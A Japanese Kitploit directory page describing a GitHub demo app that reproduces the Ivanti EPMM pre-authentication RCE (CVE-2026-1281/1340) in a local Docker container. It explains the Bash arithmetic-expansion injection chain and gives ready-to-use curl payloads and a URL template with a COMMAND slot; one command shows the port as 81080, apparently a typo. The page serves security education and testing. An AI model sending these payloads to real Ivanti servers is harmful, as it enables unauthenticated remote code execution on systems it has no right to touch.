Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — Ivanti EPMMの事前認証RCE脆弱性(CVE-2026-1281 / CVE-2026-1340)を教育およびセキュリティ研究目的で再現する方法を示すシンプルなデモアプリケーションです。 | Kitploit
ツール/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Ivanti EPMMの事前認証RCE脆弱性(CVE-2026-1281 / CVE-2026-1340)を教育およびセキュリティ研究目的で再現する方法を示すシンプルなデモアプリケーションです。

リポジトリを見る
36ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Ivanti EPMM 事前認証RCEダミーターゲット

Ivanti EPMM の事前認証RCE脆弱性(CVE-2026-1281 / CVE-2026-1340)を教育およびセキュリティ研究目的で再現する方法を示す、シンプルなデモアプリケーションです。

脆弱性の概要

この脆弱性は、Bash の算術展開の動作を悪用します。算術コンテキストで別の変数への参照を含む変数が使用され、その参照先の変数がコマンド置換を含む配列インデックスを持つ場合、コマンドが実行されます。

エクスプロイトチェーン

  1. リクエストに st=theValue (パディング付きのリテラル文字列 "theValue")が含まれる
  2. リクエストに h=gPath[\command`]`(配列インデックス内のコマンド)が含まれる
  3. Bash スクリプトが key=value ペアをループで解析し、各反復で theValue を更新する
  4. gStartTime がリテラル文字列 "theValue" に設定される
  5. ループ後、theValue には gPath[\command`]` が含まれる
  6. [[ ${currentTime} -gt ${gStartTime} ]] が評価されるとき:
  • ${gStartTime} → "theValue"(文字列)
  • 算術コンテキストは theValue を変数参照として扱う
  • theValue → gPath[\command`]`
  • 配列インデックスがコマンド置換をトリガー → RCE!

クイックスタート

root@kitploit:~
# コンテナをビルドして起動
docker-compose up --build -d

# 動作確認
curl http://localhost:8180/health

脆弱性のテスト

1. ファイル作成テスト

コマンド実行を証明するファイルを作成:

root@kitploit:~
# URLエンコードされたペイロード: id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"

# ファイルが作成されたか確認
cat artifacts/poc

2. 時間ベースのテスト

sleep コマンドで検証:

root@kitploit:~
# 応答に約5秒かかるはず
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"

3. カスタムコマンドの実行

root@kitploit:~
# カスタムコンテンツを書き込む
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"

cat artifacts/pwned

URL構造

root@kitploit:~
/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMAND%60%5D/uuid.ipa
                               │      │              │              │
                               │      │              │              └─ ペイロード: gPath[`COMMAND`]
                               │      │              └─ 終了タイムスタンプ(任意の10桁)
                               │      └─ 重要: リテラル "theValue" + スペース2個(合計10文字)
                               └─ キーインデックス(任意の値)

デバッグ

root@kitploit:~
# コンテナログを表示
docker-compose logs -f

# コンテナ内でシェルを取得
docker exec -it ivanti-epmm-vuln /bin/bash

# nginx エラーログを確認
docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log

クリーンアップ

root@kitploit:~
docker-compose down
rm -rf artifacts/*

参考情報

  • WatchTowr Labs ブログ記事

免責事項

これは教育および許可されたセキュリティテスト目的のみを対象としています。所有していない、または明示的なテスト許可がないシステムに対して使用しないでください。

ツールをダウンロード